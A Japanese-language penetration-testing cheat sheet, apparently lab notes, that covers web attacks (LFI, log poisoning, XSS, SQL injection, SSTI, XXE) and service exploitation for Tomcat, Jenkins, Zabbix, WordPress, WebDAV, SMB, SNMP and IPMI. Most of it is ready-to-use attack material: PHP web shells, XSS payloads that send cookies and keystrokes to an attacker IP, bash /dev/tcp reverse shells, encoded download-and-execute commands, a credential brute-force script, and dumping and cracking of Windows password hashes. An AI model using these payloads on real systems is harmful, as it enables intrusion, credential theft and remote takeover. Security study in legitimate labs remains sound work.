#### LFIを利用して読み取りを狙うファイル:
Linux:
```
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/<username>/.ssh/authorized_keys
/home/<username>/.ssh/id_rsa
```
Windows:
```
/boot.ini
/autoexec.bat
C:/windows/system32/drivers/etc/hosts
```
```
C:/inetpub/wwwroot/
C:/inetpub/wwwroot/web.config
C:/inetpub/logs/logfiles/
```
```
C:/xampp/apache/conf/httpd.conf
C:/xampp/security/webdav.htpasswd
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/tomcat/conf/web.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webdav/webdav.txt
C:/xampp/apache/bin/php.ini
C:/xampp/apache/conf/httpd.conf
```
パスワードハッシュの取得:
```
C:\Windows\repair\SAM
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\SAM
C:\Windows\repair\system
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\RegBack\SAM.OLD
C:\Windows\System32\config\RegBack\SYSTEM.OLD
```
```
pwdump SYSTEM SAM
or
samdump2 SYSTEM SAM
or
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM local
or
impacket-secretsdump -sam SAM -security -system SYSTEM local
```
#### ^Log Poisoning(LFI2RCE)
ログファイルにペイロードを書き込んで、LFIを利用してアクセスすることでペイロードを実行する。
apache2:
User-Agentに下記のペイロードを書き込んで送信する。
```
User-Agent: <?php system($_GET['cmd']); ?>
```
```
/var/log/apache2/access.log
http://<url>/browse.php?files=/var/log/apache2/access.log&cmd=whoami
```
vsftpd:
ftpに接続してから、下記のペイロードを入力する。
```
ftp 10.10.10.1
Connected to 10.10.10.1.
220 (vsFTPd 3.0.3)
Name (10.10.10.1:kali): <?php system($_GET['cmd']); ?>
```
```
/var/log/vsftpd.log
http://<url>/browse.php?files=/var/log/vsftpd.log&cmd=whoami
```
### ^RFI
allow_url_includeオプションがONになっている場合に有効。
```
http://<Target IP>/<file>.php?file=http://<Attacker IP>/rs.php
```
### ^XSS(クロスサイトスクリプティング)
```
<script>alert(1);</script>
"><script>alert(1);</script>
<a onmouseover="alert(document.cookie)">XSS</a>
<iframe src="javascript:alert('XSS');"></iframe>
<IMG SRC=jAvascript:alert('XSS')>
```
```
# ソースコードが下記のような場合
<script>
document.getElementsByClassName('name')[0].innerHTML='test';
</script>
# 攻撃コードは以下のようになる
「'」でフィールドを閉じて、「;」でコマンドを終了させる。
「//」でコメントを作成。
';alert('xss');//
```
```
# セッションハイジャック
<script>fetch('https://<Attacker IP>?cookie=' + btoa(document.cookie) );</script>
# キーロガー
<script>document.onkeypress = function(e) { fetch('https://<Attacker IP>?key=' + btoa(e.key) );}</script>
# メールアドレスの変更によるパスワードリセット攻撃
<script>user.changeEmail('[email protected]');</script>
```
### ^SQLインジェクション
・後ろのスペースを入れて使用
```
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or ('1'='1--
```
#### UNION Injection
コメントアウトには「-- 」or「#」を使用する。
1.UNION攻撃に必要な列数の決定
```
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
# 実際の列数を超えると以下のエラーが返される
The ORDER BY position number 3 is out of range of the number of items in the select list.
```
```
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# nullの数が列の数と一致しない場合、以下のエラーが返される
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.
```
2.UNION攻撃で有用なデータ型の列を見つける
```
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
# 型が一致しない場合、以下のエラーが返される
エラーが返されない場合、その列で文字列が取得可能なことが分かる
Conversion failed when converting the varchar value 'a' to data type int.
```
3.DBのバージョン取得
```
' union select version(),null,null,null #
```
4.DB名の取得
```
' UNION SELECT DATABASE(),NULL,NULL,NULL#
```
5.テーブルの取得
```
' union select table_name,null from information_schema.tables
' union select table_name,null from information_schema.tables where table_schema = '<4で判明したDB名>'#
```
6.テーブルのカラムを参照
```
' union select table_name,column_name from information_schema.columns #
' union select table_name,column_name from information_schema.columns where table_schema = '<4で判明したDB名>'#
```
7.データの取得
```
' union select user,password from <DB名>.<テーブル名> #
' union select user,password from dvwa.users #
```
#### SQLインジェクション→reverse shell
SQLmap:
```
sqlmap -u http://192.168.56.1/vuln.php?id=1
sqlmap -u http://192.168.0.1/vuln.php?id=1 --user-agent "Mozilla / 5.0(X11; Linux x86_64; rv:60.0 )Gecko / 20100101 Firefox / 60.0 "
```
### ^NoSQLインジェクション
[]
### ^XXE(XML External Entitiy)
下のエクスプロイトでは、&xxe;と記述した箇所でfile:///etc/passwdを実行させている。
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bugreport>
<title>test</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>&xxe;</reward>
</bugreport>
```
### SSRF(サーバサイドリクエストフォージェリ)
悪意のあるユーザーがWebサーバに攻撃者が選択したリソースに対して追加または編集されたHTTPリクエストを行わせるのを可能にする脆弱性。
SSRFには2つのタイプがあり、1つ目はデータが攻撃者の画面に返される通常のSSRF。
2つ目は、SSRFが発生するが攻撃者の画面に情報が返されたないBlind SSRF。
SSRFの脆弱性が主に見つかる箇所としては、以下の4点が挙げられる。
```
# アドレスバーのパラメータで完全なURLが使用されている場合
例) https//website.com/form?server=http://server.website.thm/store
# フォームの非表示フィールド
例) <input type="hidden" name="server" value="http://server.website.com/store">
# ホスト名などの部分的なURL
例) https://website.com/form?server=api
# URL内のパラメータでパスが使用されている場合
例) http://website.com/form?dst=/forms/contact
```
### SSTI(サーバサイドテンプレートインジェクション)
![](./image/2021-04-14-15-23-34.png)
・Jinja2(Reverse Shell)
```
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
```
### IIS(web.config)
実行コマンドにはcmd /cをつける。
cmd /cはコマンド実行後にcmd.exeを終了するオプション。
```
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c C:\Windows\Temp\shell.exe")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>
```
### Tomcat
```
/usr/share/tomcat9/etc/tomcat-users.xml
```
#### RCE
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.6 LPORT=443 -f war -o shell.war
curl --user 'tomcat':'$3cureP4s5w0rd123!' --upload-file shell.war "http://10.10.10.1:8080/manager/text/deploy?path=/shell"
nc -lvnp 443
curl --user 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.1:8080/shell/
```
#### Tomcat Default PasswdList
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
```
#!/usr/bin/env python3
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
c = line.strip().split(":")
print(c)
r = requests.get('http://10.10.10.1/manager/html', auth=(c[0], c[1])).status_code
if r == 200:
print("")
print("Found valid credentials \"" + line.strip('\n') + "\"")
sys.exit(0)
```
ログインに成功したら、msfvenomでwarファイルのペイロードを作成して、アップロードすることでreverse shellを取得。
#### Tomcat + リバースプロキシ(Apache,Nginx,IIS)
```
http://example.com/manager/html
http://example.com/manager/;/html
```
### ShellShock(CVE-2014-6271)
CGIに使用される拡張子を指定して、feroxbusterなどをかける。
CGIスクリプトに使用される言語がbashであればそのまま悪用可能であり、PerlやPythonなどの場合でもsystem関数などが使用されていれば悪用される可能性がある。
```
feroxbuster -u http://10.10.10.56/cgi-bin/ -x cgi,sh,pl,py,php
```
ShellShockが実行される環境では変数が空であるため、コマンドにはフルパスが必要。
```
User-Agent: () { :;}; echo; /usr/bin/id
```
![](./image/2022-03-07-13-21-33.png)
#### Reverse Shell
```
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.16.5/1234 0>&1
```
### Heartbleed(CVE-2014-0160)
OpenSSLの脆弱性。
サーバの秘密鍵や利用者のパスワードを盗み出すことができる可能性がある。
下記のスクリプトを利用する場合はgrepで00 00...を省くと簡潔に出力できる。
https://www.exploit-db.com/exploits/32745
```
import os
cmd = "python2 32745.py 10.10.10.79 | grep -v '00 00 00 00 00 00 00 00 00'"
for i in range(10):
os.system(cmd)
```
使いやすさ的には下記のスクリプトがオススメ。
heartbleed.py:
https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
## CMS
- CMSの特定後、ログインページについて調査
- その後、まずはデフォルトパスワードを入力
- 次にSQLインジェクションを試す
- サーバ内で見つけたものなどを用いて、パスワード推測
- 最終的にHydraなどでブルートフォース
## WordPress
### チェックするパス
```
# WordPressのバージョン確認
/license.txt
# ログインページ
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-login.php
```
### チェックするファイル
```
# データベースのパスワードあり
wp-config.php
```
### WPScan
パッシブスキャン:
```
wpscan --update
wpscan --url <url> -e u #ユーザの列挙
wpscan --url <url> -e vt #脆弱なTheme特定
wpscan --url <url> -e vp #脆弱なプラグイン特定
wpscan --url <url> -e u,vt,vp -o <output filename>
```
- -url...対象のURL指定
- -e
- u...usernameの列挙
- vt...脆弱なテーマを列挙
- at...全てのテーマを列挙
- vp...脆弱性のあるプラグインを列挙
- ap...全てのプラグインを列挙
- -o...ファイル出力
アグレッシブスキャン:
```
wpscan --url <url> -e u,vt,vp --plugins-detection aggressive
```
アグレッシブスキャン(api-tokenの使用):
```
wpscan --url <url> -e ap --plugins-detection aggressive --api-token [自分のapi-token]
```
#### リスト型攻撃/パスワード推測攻撃
```
wpscan --url http://test.com/ --passwords /usr/share/wordlist/rockyou.txt
```
上記のコマンドにより、有効なWordPressユーザーを自動的に検出して指定したパスワードリストを使用してブルートフォースする。
wp-login.phpページと有効になっている場合XMLRPCインタフェースを介したブルートフォースをサポートしている。
```
wpscan --url http://test.com/ --usernames admin --passwords /usr/share/wordlist/rockyou.txt
```
上記のようにユーザー名を指定することも可能。
#### Panel RCE
```
ログイン後、
1.[Appearance]→[Theme Editor]→[404 Template(404.php)]を選択して編集
2.PentestMonkeyのphp-reverse-shellをコピーして上書き
3.netcatでリバースシェルを待ち受け
4.下記のようなアドレスにアクセス
http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php
```
### Drupal
#### チェック項目
```
# バージョン確認
/CHANGELOG.txt
```
#### droopescan
```
pip3 install droopescan
```
```
droopescan scan drupal -u http://10.10.10.1 -t 32
```
- scan...スキャンの指定
- SilverStripe
- Wordpress
- Drupal
- -u...URLの指定
- -t...スレッド数の指定
```
MySQLに接続するための認証情報が記述されている
/var/www/html/sites/default/settings.php
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
```
### Magento
#### チェック項目
```
# DBのアカウント情報などを確認(MySQL)
app/etc/local.xml
```
#### magescan
magescan:
https://github.com/steverobbins/magescan.git
### Umbraco
#### 認証情報ファイル
```
/App_Data/Umbraco.sdf
```
## phpMyAdmin
MySQLサーバをWebブラウザで管理するためのデータベース接続ツール。
SQL文を記述することなく、MySQLの操作が行える。
WordPressのデータベースを管理できる場合、パスワードの変更などが可能。
WordPress用のパスワード作成には以下のサイトなどを利用する。
https://www.useotools.com/ja/wordpress-password-hash-generator
phpMyAdminの設定次第ではSQLタブ内に、下記のようなWebshellを埋め込むことが可能。
```
SELECT "<HTML><BODY><FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\"><INPUT TYPE=\"text\" NAME=\"cmd\"><INPUT TYPE=\"submit\" VALUE=\"Send\"></FORM><pre><?php if($_GET['cmd']) {system($_GET[\'cmd\']);} ?> </pre></BODY></HTML>"
INTO OUTFILE '/var/www/phpMyAdmin/cmd.php'
```
```
http://test.com/phpMyAdmin/cmd.php?cmd=ls
```
## Jenkins
### 既知のエクスプロイト
pwn_jenkins:
https://github.com/gquere/pwn_jenkins
### プロジェクトを作成してRCE
1.[New Item]→[Freestyle project]を選択して[Enter an item name]に名前を入力する。(testなど)
2.[Build]の中にあるタブからWindowsなら[Execute Windows batch command]、Linuxなら[Execute shell]を選択する。
3.[Command]にreverse shellペイロードを書き込んで[Save]を押下する。
(bash -i >& /dev/tcp/10.0.0.1/8080 0>&1など)
4.最後に[Build Now]を押下すると、ペイロードが発火する。
### Grooby scriptを利用したRCE
1./scriptに移動する。
2.Script Consoleに各OSに準じたスクリプトを書き込んで[Run]を押下する。
#### Linux
```
echo "bash -i >& /dev/tcp/10.9.252.239/1234 0>&1" | base64 130 ⨯
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjI1Mi4yMzkvMTIzNCAwPiYxCg==
```
```
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjI1Mi4yMzkvMTIzNCAwPiYxCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
#### Windows
```
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://10.10.10.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
```
## Zabbix
### reverse shell(Authorization)
[Configuration]→[Hosts]→ホストを選択→[Items]→右上の[Create items]→[key]に以下の内容を記述→下部の[Test]を押下→[Get Value and test]
```
# key
system.run[curl http://10.10.14.9:8000/shell.sh | bash,nowait]
# Attacker Host
echo -n 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 443 >/tmp/f' > shell.sh
python3 -m http.server 8000
```
EXPLOIT ZABBIX FOR REVERSE SHELL:
https://rioasmara.com/2022/04/16/exploit-zabbix-for-reverse-shell/
### Wappalyzer
Wappalyzerは、フレームワーク、コンテンツ管理システム(CMS)などのWebサイトが使用しているテクノロジーを特定するのに役立つオンラインツールおよびブラウザー拡張機能。バージョン番号も検索する。
https://www.wappalyzer.com/
### exiftool
・画像情報の表示
```
exiftool image.jpg
```
・画像ファイルにexiftoolを用いてコメントにリバースシェルペイロードを記述
```
exiftool -Comment=’<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ image.png
```
### WebDAV
WebDAVとはファイルの読み取りや編集をHTTPを利用してWebブラウザ上で行えるようにする機能。
Nmapなどの結果よりPUTメソッドが許可されている場合、アップロードできるファイル形式などを確認する。
```
davtest -u http://10.10.10.15
```
許可されているファイルのアップロード
phpやaspxファイルが許可されている場合、reverse shellペイロードをアップロードしてシェルを取得する。
```
curl -X PUT http://10.10.10.15/test.txt [email protected]
```
許可されている拡張子に制限がかけられており、MOVEメソッドが許可されている場合にはアップロードしたファイルの拡張子を変更することができる。
これを利用することで、WebShellの配置などが可能になる可能性がある。
```
# WebShell
cp /usr/share/webshells/aspx/cmdasp.aspx ./
curl -X PUT http://10.10.10.15/cmdasp.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.10.10.15/cmdasp.aspx' 'http://10.10.10.15/cmdasp.txt'
# msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.4 LPORT=443 -f aspx > reverse.aspx
curl -X PUT http://10.10.10.15/shell.txt --data-binary @shell.aspx
curl -X MOVE -H 'Destination:http://10.10.10.15/shell.aspx' 'http://10.10.10.15/shell.txt'
rlwrap nc -lvnp 443
curl http://10.10.10.15/shell.aspx
```
### steghide
ステガノグラフィー
```
steghide extract -sf image.jpg
```
### binwalk
ファームウェアイメージを解析して抽出するツール。
```
binwalk -Me image.png
```
- -e...既知のファイルタイプを自動的に抽出
- -M...抽出されたファイルを再起的にスキャン
## POP3(110)
```
telnet 10.10.10.1 110
```
| コマンド | 動作 |
| ---- | ---- |
| user <ユーザ名> | ユーザ名の入力 |
| pass <パスワード> | パスワードの入力 |
| stat | 受信メールの件数を表示 |
| list | 受信メールの一覧を表示 |
| retr <メール番号> | listコマンドで表示された番号を指定してメールを読む |
| dele <メール番号> | listコマンドで表示された番号を指定してメールを削除 |
| quit | 接続を終了 |
## IMAP(143,993)
コマンドが複雑なため、GUIで確認推奨。
```
sudo apt install evolution
```
[編集]→[Accounts]→[メールのアカウント]→[追加する]→[Mail Account]
上記の作業により、追加されたアカウントの情報を閲覧する。
## NFS{RPCbind,Portmapper}(111)
Network File System(NFS)はクライアントコンピュータのユーザがあたかもローカルにマウントされたストレージ上にあるかのようにファイルにアクセスすることを可能にする。
NFSはUNIX系OSで使用されることが多く、その実装は安全ではない。
NFSで使用されるRPCbindとPortmapperはともにTCPポート111で動作する。
```
kali@kali:~$ nmap -v -p 111 10.10.10.1
```
```
kali@kali:~$ nmap -sV -p 111 --script=rpcinfo 10.10.10.1
```
NFSが動作していることが分かった場合/usr/share/nmap/scriptsにあるNSEスクリプトを使用して、サービスの列挙や追加サービスの発見を行うことができる。「*」を使用することで、まとめて使用することができる。
```
kali@kali:~$ sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.10.1
```
```
kali@kali:~$ ls -1 /usr/share/nmap/scripts/nfs*
/usr/share/nmap/scripts/nfs-ls.nse
/usr/share/nmap/scripts/nfs-showmount.nse
/usr/share/nmap/scripts/nfs-statfs.nse
kali@kali:~$ nmap -p 111 --script nfs* 10.11.1.72
```
### /usr/sbin/showmountを使用したNFS共有の一覧表示
```
/usr/sbin/showmount -e 10.10.10.1
Export list for 10.10.10.1:
/home *
```
### NFSのマウント
mountコマンドを使用することでファイルのアクセスできるようになる。
```
kali@kali:~$ mkdir /tmp/mount
kali@kali:~$ sudo mount -t nfs 10.10.10.1:/home /tmp/mount/ -nolock
kali@kali:~$ cd /tmp/mount && ls
```
- -t nfs...マウントするデバイスタイプの指定(今回はnfs)
- -nolock...NLMロックを使用しない
## SMB(139,445)
### SMBの列挙(Nmap NSE Scripts)
共有とユーザー名の列挙
```
sudo nmap -p 445 --script=smb-enum-shares,smb-enum-users 10.10.195.198
```
SMBによるOSの検出や列挙(smb-os-discovery):
```
kali@kali:~$ nmap -v -p 139, 445 --script=smb-os-discovery 10.11.1.227
```
SMBプロトコルの既知の脆弱性をチェックする場合:
(unsafe=1にした場合、脆弱なシステムをクラッシュさせてしまう可能性があるので、本番システムをスキャンする場合は注意)
```
kali@kali:~$ nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.10.10.1
```
### enum4linux
```
enum4linx 10.10.10.1
```
```
enum4linux -a 10.10.10.1
```
```
enum4linux -S -U -o 10.10.10.1
```
- -S...共有リスト取得
- -U...ユーザリスト取得
- -o...OS情報取得
- -A...全ての基本的な列挙
### smbclient
匿名ログインが有効になっているかの確認。
```
smbclient -L -N //10.10.10.1
smbclient -L //10.10.10.1
smbclient -N //10.10.10.1
smbclient //10.10.10.1/tmp
smbclient //10.10.10.1/tmp -U <username>
```
- -L...リストを表示
- -N...パスワードなし
- -U...ユーザ名の指定
- -p...ポートの指定
```
Unable to connect with SMB1 -- no workgroup available
```
上記が表示された場合には-Lオプションを取り除いて、
```
smbclient //10.10.10.1/Backups
smbclient -N //10.10.10.1/Backups
```
などを指定する。
#### 共有フォルダのマウント
```
sudo mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
sudo mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
```
VHD Mount(VHDファイルからSAMとSYSTEMを抽出):
```
sudo apt-get install libguestfs-tools
sudo mkdir /mnt/vhd
sudo guestmount --add file.vhd --inspector --ro -v /mnt/vhd
sudo cd /Windows/System32/config
cp SAM SYSTEM /home/kali
impacket-secretsdump -sam SAM -system SYSTEM local
or
/usr/share/creddump7/pwdump.py SYSTEM SAM
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
hashcat -m 1000 --force 26112010952d963c8dc4217daec986d9 /usr/share/wordlists/rockyou.txt
```
### smbmap
ドメイン全体のsamba共有ドライブを列挙するために使用。
```
smbmap -H 10.10.10.1
smbmap -u <user> -p <password> -H 10.10.10.1
smbmap -H 10.10.10.1 -d <domain> -u <user> -p <password>
```
```
# 再帰的に共有フォルダを列挙
smbmap -R <共有フォルダ> -H 10.10.10.1
smbmap -R Replication -H 10.10.10.1
```
### smbコマンド
| コマンド | 説明 |
| ---- | ---- |
| dir | リスト表示 |
| exit | 終了 |
| get | 取得 |
| mget | まとめて取得 |
| mkdir | ディレクトリ作成 |
| put | 転送 |
| mput | まとめて転送 |
| lcd | ローカル側のディレクトリを移動 |
| mdir | ディレクトリ削除 |
### impacket
ネットワークプロトコルを操作するためにPythonクラスのコレクション。
SMB1-3やMSRPCなどのプロトコル実装自体を提供することに重点を置いている。
ツールを利用する以外にもよくexploitに使われているので、インストールしておく必要がある。
```
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
```
#### impacket-smbclient
```
/usr/share/doc/python3-impacket/examples/smbclient.py [email protected]
```
#### impacket-smbserver
対象サーバにツールを送り込む際に使用。
主にnetcatもpowershellも使えないようなときに使う。
```
python3 /usr/share/doc/python3-impacket/examples/smbserver.py temp .
```
```
C:\WINDOWS\system32>\\<smbserverを立ち上げたIPアドレス>\temp\whoami.exe
```
### RPCclient
```
rpcclient -U "" -N 10.10.10.1
```
### CrackMapExec
```
crackmapexec smb -L
crackmapexec 10.10.10.1 -u Administrator -H [hash] --local-auth
crackmapexec 10.10.10.1 -u Administrator -H [hash] --share
crackmapexec smb 10.10.10.1/24 -u user -p 'Password' --local-auth -M mimikatz
```
### nmap-smb
```
nmap --script smb-* -p 139,445, 10.10.10.1
nmap --script smb-enum-* -p 139,445, 10.10.10.1
```
## NetBIOS(139)
NetBIOSはローカルネットワーク上のコンピュータが相互に通信できるようにするセッション層のプロトコルである。
最近のSMBの実装ではNetBIOSがなくても動作するが、NetBIOS over TCP(NBT)は後方互換性のために必要で、ともに有効になっている場合が多い。
```
kali@kali:~$ nmap -v -p 139,445 -oG result.txt 10.10.10.1
```
#### nbtscan
NetBIOS情報を特定するための専門的ツール。オプション-rを使用することで発信元のUDPポートを137に指定している。
```
kali@kali:~$ sudo nbtscan -r 10.11.1.0/24
```
## SNMP(161)
SNMPはルータ、スイッチ、サーバなどのTCP/IPネットワークに接続された通信機器に対して、ネットワーク経由で監視、制御するためのUDPベースのアプリケーション層プロトコル。
SNMP1,2,2cではトラフィックの暗号化が行われていないため、SNMP情報や認証情報をローカルネットワーク上で傍受することができてしまう。
MIBはネットワーク管理に関連する情報を含むデータベースのことでツリー上になっている。
その下にSNMPコミュニティと呼ばれるSNMPで管理するネットワークシステムの範囲を定めたものがある。
```
kali@kali:~$ sudo nmap -sU --open -p 161 10.11.1.1-254 -oG open-snmp.txt
```
```
snmp-check 192.168.124.42
```
### Windows SNMPの列挙
#### MIBツリーの列挙
```
kali@kali:~$ snmpwalk -c public -v1 -t 10 10.10.10.1
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: x86 Family 6 Model 12 Stepping 2 AT/AT COMPAT
IBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (2005539644) 232 days, 2:56:36.44
iso.3.6.1.2.1.1.4.0 = ""
```
- -c...コミュニティ文字列を指定
- -v...SNMPバージョン番号の指定
- -t...タイムアウト期間の設定
#### MIBの値
この値を指定してやることでさまざまな情報を列挙可能。
```
1.3.6.1.2.1.25.1.6.0 (System Processes)
1.3.6.1.2.1.25.4.2.1.2 (Running Programs)
1.3.6.1.2.1.25.4.2.1.4 (Processes Path)
1.3.6.1.2.1.25.2.3.1.4 (Storage Units)
1.3.6.1.2.1.25.6.3.1.2 (Software Name)
1.3.6.1.4.1.77.1.2.25 (User Accounts)
1.3.6.1.2.1.6.13.1.3 (TCP Local Ports)
```
以下は、実際に値を設定した実行例
#### ユーザーの列挙
```
kali@kali:~$ snmpwalk -c public -v1 10.10.10.1 1.3.6.1.4.1.77.1.2.25
iso.3.6.1.4.1.77.1.2.25.1.1.3.98.111.98 = STRING: "bob"
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.8.73.85.83.82.95.66.79.66 = STRING: "IUSR_BOB"
```
#### 実行中のプロセス列挙
```
kali@kali:~$ snmpwalk -c public -v1 10.10.10.1 1.3.6.1.2.1.25.4.2.1.2
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "System Idle Process"
iso.3.6.1.2.1.25.4.2.1.2.4 = STRING: "System"
iso.3.6.1.2.1.25.4.2.1.2.224 = STRING: "smss.exe"
iso.3.6.1.2.1.25.4.2.1.2.324 = STRING: "csrss.exe"
iso.3.6.1.2.1.25.4.2.1.2.364 = STRING: "wininit.exe"
iso.3.6.1.2.1.25.4.2.1.2.372 = STRING: "csrss.exe"
iso.3.6.1.2.1.25.4.2.1.2.420 = STRING: "winlogon.exe"
```
#### TCPポートの列挙
```
kali@kali:~$ snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3
niso.3.6.1.2.1.6.13.1.3.0.0.0.0.21.0.0.0.0.18646 = INTEGER: 21
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.80.0.0.0.0.45310 = INTEGER: 80
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.135.0.0.0.0.24806 = INTEGER: 135
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.443.0.0.0.0.45070 = INTEGER: 443
```
#### インストールされているソフトウェアの列挙
```
kali@kali:~$ snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2
iso.3.6.1.2.1.25.6.3.1.2.1 = STRING: "LiveUpdate 3.3 (Symantec Corporation)"
iso.3.6.1.2.1.25.6.3.1.2.2 = STRING: "WampServer 2.5"
iso.3.6.1.2.1.25.6.3.1.2.3 = STRING: "VMware Tools"
iso.3.6.1.2.1.25.6.3.1.2.4 = STRING: "Microsoft Visual C++ 2008 Redistributable - x86
9.0.30729.4148"
iso.3.6.1.2.1.25.6.3.1.2.5 = STRING: "Microsoft Visual C++ 2012 Redistributable (x86)
```
## IPMI(623)
```
# ポート開放の確認
sudo nmap -sU -p 623 -sC -sV 10.10.11.124
# バージョン特定
msf6 > use auxiliary/scanner/ipmi/ipmi_version
# IPMI2.0の脆弱性を利用したパスワードハッシュのダンプ
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
# ダンプしたパスワードハッシュのクラック
hashcat -m 7300 hash /usr/share/wordlist/rockyou.txt
# impipwner.pyを利用したパスワードハッシュのダンプとクラック
sudo python3 ipmipwner.py --host 10.10.11.124 -c john -oH hash -pW /usr/share/wordlists/rockyou.txt
```
ipmiPwner:
https://github.com/c0rnf13ld/ipmiPwner
## rsyncd(873)
1.モジュールの列挙
```
nc -nv 192.168.227.126 873
```
```
┌──(kali㉿kali)-[~/pg/boxes/Fail]
└─$ nc -nv 192.168.227.126 873
(UNKNOWN) [192.168.227.126] 873 (rsync) open
@RSYNCD: 31.0 → 接続時にバージョン名が表示される
@RSYNCD: 31.0 → 表示されたバージョン名を送信する
#list → サーバのモジュールリストを列挙
fox fox home
@RSYNCD: EXIT
```
```
┌──(kali㉿kali)-[~/pg/boxes/Fail]
└─$ nc -nv 192.168.227.126 873
(UNKNOWN) [192.168.227.126] 873 (rsync) open
@RSYNCD: 31.0 → 接続時にバージョン名が表示される
@RSYNCD: 31.0 → 表示されたバージョン名を送信する
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g → これはパスワードが必要であることを意味する
```
nmapを利用した列挙:
```
nmap -sV --script "rsync-list-modules" -p 873 192.168.227.126
```
```
┌──(kali㉿kali)-[~/pg/boxes/Fail]
└─$ nmap -sV --script "rsync-list-modules" -p 873 192.168.227.126
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 13:05 JST
Nmap scan report for 192.168.227.126
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
| rsync-list-modules:
|_ fox fox home
